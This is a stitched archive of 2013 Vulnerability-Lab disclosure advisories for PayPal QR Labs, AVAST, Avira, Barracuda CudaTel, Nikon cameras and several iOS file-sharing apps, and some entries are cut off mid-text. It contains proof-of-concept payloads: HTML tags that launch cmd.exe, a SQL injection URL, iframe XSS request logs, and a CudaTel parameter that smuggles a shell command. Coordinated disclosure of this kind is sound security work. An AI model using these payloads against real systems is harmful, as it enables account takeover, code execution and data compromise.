Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability 
Laboratory

-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com

Paypal Bug Bounty #102 QR Dev Labs - Auth Bypass Vulnerability

2013-07-05 Thread Vulnerability Lab

Title:
==
Paypal Bug Bounty #102 QR Dev Labs - Auth Bypass Vulnerability


Date:
=
2013-07-05


References:
===
http://www.vulnerability-lab.com/get_content.php?id=995

PayPal Security UID: ZVf25kC


VL-ID:
=
995


Common Vulnerability Scoring System:

7.1


Introduction:
=
Shopping made easy with PayPal QR enabled on your mobile device. You can scan 
for deals using the QR Code displayed in shops, 
trains stations, bus-stops  banners and purchase items in just a few taps. 
Make shopping experience easy for your customer.

(Copy of the Vendor Homepage: https://qr.paypal-labs.com )


Abstract:
=
An independent vulnerability laboratory researcher discovered an auth bypass 
web session vulnerability in the PayPal QR Labs Service Web Application.


Report-Timeline:

2012-05-11:Researcher Notification  Coordination (Cernica Ionut)
2013-05-14:Vendor Notification (PayPal Inc Security Incident Team - Bug 
Bounty Program)
2013-06-20:Vendor Fix/Patch (PayPal Inc Developer Team)
2013-07-05:Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
PayPal Inc
Product: QR Labs Online Service - Web Application 2013 Q2


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

An auth bypass session web vulnerability is detected in the official PayPal QR 
Labs Service Web Application.
The vulnerability allows remote attackers to bypass the web- or system user 
auth of the affected 
vulnerable computer system to compromise paypal accounts.

The bug is located in the application account login module when processing to 
load manipulated j_password 
parameters via GET method. Attackers are able the decrypt and exchange the 
information in the request live 
with a session tamper to take-over other accounts. At the end the vulnerability 
allows remote attackers to 
enter remotely any paypal qr labs account of the web application.

Exploitation of the vulnerability does not require user interaction but a low 
privileged paypal qr labs 
application user account. Successful exploitation results in account steal or 
compromise and stable user 
session manipulation with different effects.

Vulnerable Service(s):
[+] PayPal Inc – qr.paypal-labs.com

Vulnerable Module(s):
[+] Account - Login

Vulnerable Parameter(s):
[+] j_password

Affected Module(s):
[+] Account System


Proof of Concept:
=
The vulnerability can be exploited by remote attackers with low privilege 
paypal qr labs application user account and 
without user interaction. For demonstration or reproduce ...

Note:
After some security checks to authenticate in the qr.paypal-labs.com web 
application, the last request for being authenticate 
in this web application it is not secure implemented.

Afected Link:
https://qr.paypal-labs.com/j_security_check?j_username=loger...@gmail.comj_password=96301aa9f02b5d12278b0e902dc5434ed9477d19

Note:
If we look at the request wich is a GET method request we will soon see ...
If we encrypt the j_username parameter value as SHA1 ... 
The result will be the value of the j_password parameter

Note: PoC Video
The username loger...@gmail.com is encrypted in SHA1 it is equals with  
96301aa9f02b5d12278b0e902dc5434ed9477d19
In the demonstration above it seems that the password of the username is 
encrypted in SHA1 ;)


Solution:
=
2013-06-20:Vendor Fix/Patch (PayPal Inc Developer Team)


Risk:
=
The security risk of the auth bypass web session vulnerability is estimated as 
high(+).


Credits:

Independent Security Researcher – Cernica Ionut Cosmin 
(ionut.cern...@whit3hat.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com

AVAST Antivirus v8.0.1489 - Multiple Core Vulnerabilities

2013-07-05 Thread Vulnerability Lab

 to the `Offline Registration` section and click on ``Enter the 
License Key``
d) Enter the following payload h1Vulnerable/h1 and click OK
e) You should now see the entered string `Vulnerable` in Heading 1 format 
proving the existence of this vulnerability.



Proof of Concept #2 Local Image File Include

For reproducing the Local File include through img tag bug successfully, 
please follow the below mentioned steps:

a) Right Click on Avast Tray Icon and click on ``Registration Information``
b) Scroll down to the `Offline Registration` section and click on ``Enter the 
License Key``
c) Enter the following payload img src=``file:///YOURFILE``/img and click OK
d) You should now see the local image file loaded successfully from your system 
proving the existence of this vulnerability.

Note:
For POC #2 I copied a file called logo.png to my C:/ folder and used the 
following payload to produce the bug img src=``file:///C:/logo.png``/img



Proof of Concept #3 Command Shell on Local System (cmd.exe)

For reproducing the bug, please follow these below mentioned steps:

a) Right Click on Avast Tray Icon and click on ``Registration Information``
b) Scroll down to the `Offline Registration` section and click on ``Enter the 
License Key``
c) Enter the following payload a href=``cmd`` and click OK
d) You should now see the cmd.exe file loaded successfully from your system 
proving the existence of this vulnerability.
e) You can also use the payloads mentioned under next section for some 
interesting results:


Interesting Payloads:

a href=``test.com``
a href=``explorer.exe``
a href=
a href=``shell:System``
a href=``calc``
a href=``mspaint.exe``
a href=``notepad.exe``

Please note: All tests were performed on a system running latest version of 
MicroSoft Windows 7 OS.


POC Technical Description 
Here, we used the common HTML tags as our payload. The fact that user injected 
HTML code is being executed succesfully raises concerns for this core 
applications security. Then, the fact that using just the a href tag, we can 
easily bypass AVAST Sandbox and gain local system shell with priviledges of the 
user that installed the application initially which in most cases will be 
administrator is very critical. I believe this bug can be further escalated to 
gain more interested results. I also wanted to test the License file for input 
validation but I havent been able to perform that test yet due to not having 
access to a proper license file. I intend to test that feature because i 
believe it might also be vulnerable.


Solution:
=
By default, no user should be allowed to inject HTML code in the application. 
This can be mitigated by performing proper input sanatization 
of the vulnerable fields. All illegal characters should also be escaped and 
application source code should be hardened overall. 
Proper input sanatization in the source code will fix this issue.



Risk:
=
The security risk of the detected software vulnerabilities are estimated as 
medium(+).



Credits:

Vulnerability Laboratory [Research Team] - Ateeq Khan 
[at...@vulnerability-lab.com]


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability-Lab or its suppliers 
have been advised of the possibility of such damages. Some states do not allow 
the exclusion or limitation of liability for consequential or incidental 
damages so the foregoing limitation may not apply. We do not approve or 
encourage anybody to break any vendor licenses, policies, deface websites, hack 
into databases or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com- www.vuln-lab.com  - 
www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com  - supp...@vulnerability-lab.com
 - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com  - forum.vulnerability-lab.com  
- news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab   - facebook.com/VulnerabilityLab - 
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark

Avira Analysis Web Service - SQL Injection Vulnerability

2013-07-08 Thread Vulnerability Lab

Title:
==
Avira Analysis Web Service - SQL Injection Vulnerability


Date:
=
2013-07-08


References:
===
http://www.vulnerability-lab.com/get_content.php?id=997


VL-ID:
=
997


Common Vulnerability Scoring System:

8.5


Abstract:
=
The Vulnerability Laboratory Core Research Team discovered a critical SQL 
Injection vulnerability in the Avira Analysis online service application.


Report-Timeline:

2013-05-25:Vendor Notification
2013-05-26:Vendor Response/Feedback
2013-06-31:Vendor Fix/Patch
2013-07-08:Public Disclosure


Status:

Published


Affected Products:
==
Avira
Product: Analysis - Web Application  Online Service 2013 Q2


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

A remote SQL Injection web vulnerability is detected in #1616; the official 
Avira Analysis online service application.
The vulnerability allows remote attackers to inject own sql commands to 
compromise the affected application dbms.

The SQL Injection vulnerability is located in the `overview` file when 
processing to request manipulated `uniqueid` parameter. 
By manipulation of the `uniqueid` parameter the attackers can inject own sql 
commands to compromise the webserver application dbms. 

When processing to bypass the filter validation by trying to use a single qoute 
or a double qoute to check if the parameter is vulnerable or not, 
attackers will be redirected to another page, but when the attacker is 
processing to request with a back-slash the context will be executed 
and new mysql errors will become visible for exploitation.

The vulnerability can be exploited by remote attackers without privileged 
application user account and without required user interaction. 
Successful exploitation of the sql injection vulnerability results in web 
application and online service dbms compromise.

Vulnerable Module(s):
[+] en

Vulnerable File(s):
[+] overview

Vulnerable Module(s):
[+] uniqueid


Proof of Concept:
=
The remote sql injection web vulnerability can be exploited by remote attackers 
without privileged application user account and without 
required user interaction. For demonstration or reproduce ...

Vulnerable Service Domain:  analysis.avira.com
Vulnerable Module:  en
Vulnerable File:overview
Vulnerable Parameter:   uniqueid


Note: When trying to use a single qoute or a double qoute to check if the 
parameter is vulnerable or not, you will be redirected to another page, 
but when processing to load with a back-slash new mysql errors will become 
visible for exploitation.


POC: 
https://analysis.avira.com/en/overview?start=0uniqueid=1YcGIXI0qbPbpTHg7YvFEr8MG7JmkbSg\[SQL
 INJECTION VULNERABILITY!]


PoC Video:
http://www.youtube.com/watch?v=Odko5PTKA-Q


Reference(s):
https://analysis.avira.com/


Solution:
=
The vulnerability can be patched by a restriction and secure parse of the 
uniqueid parameter request.


Risk:
=
The security risk of the remote sql injection web vulnerability is estimated as 
critical.


Credits:

Vulnerability Laboratory [Research Team] - Ebrahim Hegazy [Zigoo] 
(ebra...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file

Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability

2013-07-10 Thread Vulnerability Lab

.png.gif.php.js.html/a/td
td27,27KB/tdtd align=center2013-07-08 23:07:52/tdtd 
align=centera onclick=javascript:delfile(1337.png.gif.php.js.html); 
class=transparent_buttonDelete/a/td/tr

1.3
trtdimg src=Air%20Drive%20-%20Files_files/file.png height=20px 
width=20px/tdtda target=_blank 
href=http://192.168.2.104:8000/AirDriveAction_file_show/[PERSISTENT INJECTED 
SCRIPT CODE!]1337.png[PERSISTENT INJECTED SCRIPT 
CODE!]1337.png/a/tdtd27,27KB/tdtd align=center
2013-07-08 23:07:52/tdtd align=centera 
onclick=javascript:delfile([PERSISTENT INJECTED SCRIPT CODE!]1337.png); 
class=transparent_buttonDelete/a/td/tr


--- Session Request Log ---
Status: 302[Found]

POST http://localhost:8000/AirDriveAction_file_add 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[83] 
Mime Type[text/html]

   
Request Headers:
  
Host[localhost:8000]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  
Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
  
DNT[1]
  Referer[http://localhost:8000/index_files.html]
  
Connection[keep-alive]
   Post Data:
  
POST_DATA[-228191371227676
Content-Disposition: form-data; name=uploadfile; 
filename=;/private/var/mobile/Applications/1337.png


Reference(s):
http://localhost:8000/AirDriveAction_file_add 


Risk:
=
The security risk of the arbitrary file upload vulnerability and the multiple 
extensions issue are estimated as high(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability 
Laboratory



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com

Nikon CoolPix L Series Fw1.0 - Information Disclosure Issue

Title:
==
Nikon CoolPix L Series Fw1.0 - Information Disclosure Issue


Date:
=
2013-07-16


References:
===
http://www.vulnerability-lab.com/get_content.php?id=1014


VL-ID:
=
1014


Common Vulnerability Scoring System:

3.5


Introduction:
=
Attractive, sturdy and easy to use, the 16-megapixel COOLPIX L27  25 is clever 
with images—so you don’t have to be. 
Simple controls and smart automatic technology deliver steady images and ensure 
you capture portraits with smiling 
faces and open eyes, through the NIKKOR wide-angle 5x optical zoom lens.

A large 6.7-cm (2.7-in.) LCD screen displays images with superb clarity at any 
time of day or night and you can 
switch to filming the action at the touch of a button, or set the camera to 
Easy Auto mode and capture photos 
without worrying about a thing.

(Copy of the Vendor Homepage: 
http://www.europe-nikon.com/en_GB/product/digital-cameras/coolpix/life/coolpix-l27
 )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a information disclosure 
issue in the Nikon CoolPix Digital Camera L25 with Firmware 1.0.


Report-Timeline:

2013-07-16:Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Nikon
Product: COOLPIX L25 L27  L28


Exploitation-Technique:
===
Hardware


Severity:
=
Medium


Details:

An information disclosure issue is detected in the official Nikons Camera L 
Series 25, 28  maybe others.
The information disclosure bug allows remote attackers to access sensitive 
information of other people, websites, servers or companies.

The privacy issue is located in the menu  system module when processing to 
save a start bild (start picture) when processing to boot 
the camera system. The camera allows to save a start bild (start picture) and 
does not remove it when processing to perform a format or 
firmware reset. People can access the device to watch in the short review of 
the start bild (start picture) the earlier deleted pictures. 
The device does not recognize it and stored the pictures without the 
possibility to delete.

In a scenario on eBay we bought from a private seller a nikon camera. He uses 
the camera about 2 years for his holiday trips and conferences.
He recognized in a mail the camera got a format and firmware reset. When the 
camera arrived at our location we was watching the into short 
review of the start bild (start picture) and saw several images of the owner.


Proof of Concept:
=
The information disclosure issue can be reproduced by local attackers with 
physical camera device access.

Steps to reproduce ...

1.   Start the Nikon L series camera
2.   Go in the camera screen mode and take a nice picture
3.   Go to System  Start Bild
4.   Choose your own picture and save it as start picture
5.   Now shutdown the camera the regular way and start it again after some 
secounds
6.   The image of us will be visible when the system boots
7.   When go to the Menu go to System and format the device
8.   Go to Menu again and switch to System
9.   After the format we now reset the device
10. Shutdown the Nikon Camera and take out the sd card of course
11. Restart it and go to the menu, open the start bild (start picture) module
12. Now the image of us is visible even but we did  a full hardware reset or 
format
13. Information Disclosure issue in Nikon L Series successful reproduced!

Note:
When the image is saved in the camera as start picture, no format  no firmware 
reset can remove it anymore.


Solution:
=
To fix the vulnerability remove with the firmware reset or format all pictures 
from the review menu.


Risk:
=
The security risk of the information disclosure issue is estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability

FTP Sprite v1.2.1 iOS - Persistent Web Vulnerability

 Session Log ---

Status: 200[OK]

POST 
http://192.168.2.104:41495/?type=createdirguid=EFB7891B-84ED-4C48-A404-95960BBB95D0
 
Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Content Size[506] Mime 
Type[text/plain]
   

Request Headers:
Host[192.168.2.104:41495]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
Accept[text/html, */*; q=0.01]

Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]

X-Requested-With[XMLHttpRequest]
  

Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0type=
childdate=Thu%20Jul%2011%202013%2020:05:48%20GMT+0200type=childdate=Thu%20Jul%2011%202013%2020:06:
26%20GMT+0200type=childdate=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200]
Content-Length[87]

Connection[keep-alive]

Pragma[no-cache]
Cache-Control[no-cache]

Post Data:
  
item0[%3Ciframe%20src%3Dhttp%3A%2F%2Fwww.vuln-lab.com%20onload%3Dalert(%22BKM%22)%20%3C]

Response Headers:
  
Accept-Ranges[bytes]
  
Content-Length[506]
  
Content-Type[text/plain]
  
Date[Thu, 11 Jul 2013 18:14:33 GMT]


20:08:50.658[40ms][total 40ms] 
Status: 404[Not Found]
GET http://192.168.2.104:41495/%3C/a 
Load Flags[LOAD_DOCUMENT_URI  ]
Content Size[0] Mime Type[application/x-unknown-content-type]
   

Request Headers:
  
Host[192.168.2.104:41495]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
  

Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0type=childdate=Thu%20Jul%2011%202013%2020:05:
48%20GMT+0200type=childdate=Thu%20Jul%2011%202013%2020:06:26%20GMT+0200type=childdate=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200]
Connection[keep-alive]
   

Response Headers:
Accept-Ranges[bytes]
Content-Length[0]
Date[Thu, 11 Jul 2013 18:14:34 GMT]


Solution:
=
To fix the vulnerability parse the add folder name input field and restrict it 
but also cleanup the affected listing module with the output.


Risk:
=
The security risk of the persistent input validation web vulnerability is 
estimated as high(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability 
Laboratory

-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com

Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability

Title:
==
Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability


Date:
=
2013-07-15


References:
===
http://www.vulnerability-lab.com/get_content.php?id=776

BARRACUDA NETWORK SECURITY ID: BNSEC-807


VL-ID:
=
776


Common Vulnerability Scoring System:

2.1


Introduction:
=
Designed to enable seamless voice and video communication, the CudaTel 
Communication Server is an easy-to-use, 
affordable, next-generation phone system for businesses. CudaTel Communication 
Server s enterprise-class 
feature set includes Voice over IP (VoIP) PBX services, conferencing, 
follow-me, automated attendant services, 
and more, controlled by an easy-to-use Web interface. CudaTel Communication 
Server is compatible with any SIP 
device and provider, and can be pre-configured for use with both analog and 
digital telephone networks. Powerful, 
Complete Solution With an expansive feature set and and no per user or phone 
licensing fees, the CudaTel 
Communication Server is equipped and priced for organizations of any size. 
Native High Definition audio support 
and integrated phone line (TDM) hardware produces an unparalleled audio 
experience. VOIP encryption protects calls 
from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a client side web 
vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.


Report-Timeline:

2012-11-26: Researcher Notification  Coordination
2012-11-27: Vendor Notification
2012-12-01: Vendor Response/Feedback
2013-04-03: Vendor Fix/Patch
2012-07-15: Public Disclosure


Status:

Published


Affected Products:
==
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

A client side input validation vulnerability is detected  in Barracuda Networks 
CudaTel v2.6.002.040 appliance application.
The non-persistent vulnerability allows remote attackers to manipulate website 
links to provoke malicious client side (application-side) requests.

The secound vulnerability (client side) is located in the `error:Internal 
Error` exception handling. When remote attackers provoke to 
load an invalid request the exception-handling will display the earlier 
inserted bbx_hostname (malicious) web context (exp. script codes). 
The attacker can use the vulnerable bbx_backup_site_host parameter of the test 
connection listing module to provoke an evil application 
exception-handling request.

Successful exploitation of the vulnerability results in client side phishing, 
client side session hijacking and client side 
external redirects to malware or evil websites. Exploitation of the 
vulnerability requires medium application user interaction.

Vulnerable Section(s):
[+] Test - Connection

Vulnerable Module(s):
[+] Exception-handling [Internal Error] - 
Listing

Vulnerable Parameter(s):
[+] bbx_backup_site_host


Proof of Concept:
=
The vulnerability can be exploited by remote attackers with low or medium 
required user interaction and without privileged application user account.
For demonstration or reproduce ...


Review: Exception-handling [Internal Error] - Listing [bbx_backup_site_host]

pre--- 
error: Internal error.\n[backup] 
Can't connect to \iframe src=test3-Dateien/a.htm 
href=http://vuln-lab.com/?content-type=text/html;http://vuln-lab.com/a
/pre/body/html/iframe/pre


PoC:
http://cudatel.ptest.cudasvc.com/gui/backup/test
?_=1353975862209bbx_backup_site_id=2bbx_backup_site_type=ftp
bbx_backup_site_host=%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3Ebbx_backup_site_port=8bbx_backup_site_user=BENJAMINKM
bbx_backup_site_path=%2F+%26+echo+%3E+%2Fdata%2Fsounds%2Fmusic%2F8%2F2a10577f-6764-4368-8571-44d42e4695ff


Solution:
=
The vulnerability can be patched by parsing the vulnerable bbx_backup_site_host 
parameter request.
Parse the internal error exception-handling when processing to display the 
error string of the requested parameter. (error context)

2013-04-03: Vendor Fix/Patch

Note: Barracuda Networks provided a download in the customer section but also 
automatic update to patch the issue in the appliance series.


Risk:
=
The security risk of the client side input validation vulnerability is 
estimated as medium(-) because of the main location in the exception-handling.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either

Dell Kace 1000 SMA v5.4.70402 - Persistent Vulnerabilities

 are 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Ibrahim Mosaad El-Sayed  
[ibra...@evolution-sec.com]


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability 
Laboratory


-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com

Olive File Manager v1.0.1 iOS - Multiple Vulnerabilities

 in the index file dir listing module of the 
web-server (http://localhost:8797/) when processing to 
display via POST request method injected manipulated `folder names`. The 
persistent script code will be executed in the main 
index file dir listing module when the service lists the new malicious injected 
foldername as item.

Exploitation of the persistent web vulnerability requires low or medium user 
interaction without application user account.
Successful exploitation of the vulnerability can lead to persistent session 
hijacking (customers), account steal via persistent 
web attacks, persistent phishing or stable (persistent) certificate mail 
notification context manipulation.

Vulnerable Application(s):
